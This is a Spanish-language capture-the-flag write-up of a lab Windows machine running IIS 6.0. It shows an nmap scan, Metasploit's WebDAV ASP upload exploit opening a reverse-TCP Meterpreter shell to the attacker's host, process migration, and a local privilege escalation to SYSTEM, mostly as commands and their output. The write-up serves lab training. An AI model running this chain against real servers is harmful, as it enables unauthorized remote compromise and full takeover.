Como siempre empezamos con un NMAP

root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 14:24 CEST
Nmap scan report for 10.10.10.15
Host is up (0.022s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http	Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Date: Fri, 18 Oct 2019 12:24:42 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.00 seconds

Lo único y al mismo tiempo más interesante es el IIS 6
Busque en searchsploit y Metasploit y me salieron un millon.

Google recomienda:

msf5 > use exploit/windows/iis/iis_webdav_upload_asp
msf5 exploit(windows/iis/iis_webdav_upload_asp) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Checking /metasploit262514588.asp
[*] Uploading 610960 bytes to /metasploit262514588.txt...
[*] Moving /metasploit262514588.txt to /metasploit262514588.asp...
[*] Executing /metasploit262514588.asp...
[*] Deleting /metasploit262514588.asp (this doesn't always work)...
[!] Deletion failed on /metasploit262514588.asp [403 Forbidden]
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.15:1030) at 2019-10-18 14:31:06 +0200

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 1724 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

Y es suficiente pero solo es un usuario de network services…

Asi que migramos a otro proceso:

exit
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_upload_asp) > use post/windows/manage/migrate
msf5 post(windows/manage/migrate) > set session 1
session => 1
msf5 post(windows/manage/migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (824)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3164
[+] Successfully migrated to process 3164
[*] Post module execution completed

Y usamos el suggester

msf5 post(windows/manage/migrate) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Hay muchos, a partir de ahora probamos hasta que encontramos uno interesante.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf5 exploit(windows/local/ppr_flatten_rec) > options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name 	Current Setting  Required  Description
   ---- 	---------------  --------  -----------
   SESSION               	yes   	The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/ppr_flatten_rec) > set session 1
session => 1
msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on 172.16.10.164:4444
[*] Launching notepad to host the exploit...
[+] Process 3952 launched.
[*] Reflectively injecting the exploit DLL into 3952...
[*] Injecting exploit into 3952 ...
[*] Exploit injected. Injecting payload into 3952...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ppr_flatten_rec) > ifconfig
[*] exec: ifconfig

Aqui hubo un detalle esta usando un ip que no es [*] Started reverse TCP handler on 172.16.10.164:4444

Options no me mostraba mucho así que hay que usar advanced options.

Payload options (windows/meterpreter/reverse_tcp):

   Name  	Current Setting  Required  Description
   ----  	---------------  --------  -----------
   EXITFUNC  thread       	yes   	Exit technique (Accepted: '', seh, thread, process, none)
   LHOST 	10.10.14.8   	yes   	The listen address (an interface may be specified)
   LPORT 	4444         	yes   	The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf5 exploit(windows/local/ppr_flatten_rec) >

Ya con eso funciona

msf5 exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 1244 launched.
[*] Reflectively injecting the exploit DLL into 1244...
[*] Injecting exploit into 1244 ...
[*] Exploit injected. Injecting payload into 1244...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.15:1031) at 2019-10-18 14:37:32 +0200

meterpreter > shell
Process 1732 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

Y ya somos admins 🙂

Me gusto mucho más que grandpa y acabo de tener una maquína nueva 🙂